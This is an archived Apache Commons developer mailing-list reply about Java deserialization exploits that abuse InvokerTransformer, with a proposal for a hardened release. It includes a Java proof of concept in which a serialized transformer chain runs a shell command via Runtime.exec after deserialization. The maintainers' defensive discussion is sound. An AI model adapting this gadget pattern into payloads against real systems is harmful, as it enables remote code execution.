commons-dev mailing list archives

From Thomas Neidhart <thomas.neidh...@gmail.com>
Subject Re: [collection][security] InvokerTransformer misused in java object serialisation exploits
Date Fri, 06 Nov 2015 23:56:00 GMT
On 11/06/2015 10:25 PM, Bernd Eckenfels wrote:
> Hello,
> 
> I came across this article:
> 
> http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
> 
> It describes attacks against common Java applications with
> pre-authentication requests using malicious Java Object serialisation.
> It builds upon the work of Gabriel Lawrence (@gebl) and Chris Frohoff
> (@frohoff) (presented on January 28th, 2015, “Marshalling Pickles”
> given at AppSecCali)
> 
> http://www.slideshare.net/frohoff1/appseccali-2015-marshalling-pickles
> 
> The ysoserial tool has some sample payloads, two use
> commons-collection oac.collections.functors.InvokerTransformer.
> 
> https://github.com/frohoff/ysoserial/tree/master/src/main/java/ysoserial/payloads
> 
> The class itself is rather handy to break out of the readObject()
> chains to execute arbitrary methods.
> 
> I don't recall any discussion here about this
> class. Is this currently handled/reported? Of course the more general
> problem is using serialisation with untrusted peers, and if
> commons-collection fixes this, there might still be other vectors, but
> still I think it would be good to do something against that "bad press"?

I was not aware of this yet, thanks for the pointers.

If we removed the problematic classes and released a new collections
version (for the 3.x or 4.x branch), we would break source and binary
compatibility.

It might be acceptable/doable to release a collections version with an
additional maven classifier (e.g. -hardened) that removes the relevant
classes and explain the compatibility issues in detail in the release
notes. What do others think about something like that?

btw. with Java 8 you can do similar things by using serialized method
references. I did create a very simple example to illustrate the issue:

import java.io.BufferedReader;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.ArrayList;
import java.util.List;

// Commons Collections 4.x: the varargs ChainedTransformer constructor used
// below exists in 4.x (3.x takes a Transformer[]).
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.list.TransformedList;

public class MyTest {

    public static void main(String[] args) throws Exception {
        // Serializable method references: both survive a writeObject()/readObject() round trip.
        final SAM1 m1 = (SAM1 & Serializable) Runtime::getRuntime;
        final SAM2 m2 = (SAM2 & Serializable) Runtime::exec;

        // t1 ignores its input and returns the Runtime; t2 runs "ls" on it and collects the output.
        Transformer t1 = (Transformer & Serializable) (input) -> m1.action();
        Transformer t2 = (Transformer & Serializable) (input) -> {
            try {
                Process p = m2.action((Runtime) input, "ls");

                String line;
                StringBuilder output = new StringBuilder();
                BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
                while ((line = reader.readLine()) != null) {
                    output.append(line);
                    output.append("\n");
                }
                reader.close();
                return output.toString();
            } catch (IOException e) {
                return null;
            }
        };

        ChainedTransformer chain = new ChainedTransformer(t1, t2);
        TransformedList list = TransformedList.transformedList(new ArrayList(), chain);

        FileOutputStream fos = new FileOutputStream("test.ser");
        ObjectOutputStream os = new ObjectOutputStream(fos);
        os.writeObject(list);
        os.close();

        FileInputStream fis = new FileInputStream("test.ser");
        ObjectInputStream ois = new ObjectInputStream(fis);

        List l2 = (List) ois.readObject();

        // The deserialized list still carries the chain: adding an element
        // runs t1 and then t2 on the reading side.
        l2.add(1);

        // Print the result
        System.out.println(l2);
        ois.close();
    }

    interface SAM1 {
        Runtime action();
    }

    interface SAM2 {
        Process action(Runtime r, String s) throws IOException;
    }

}

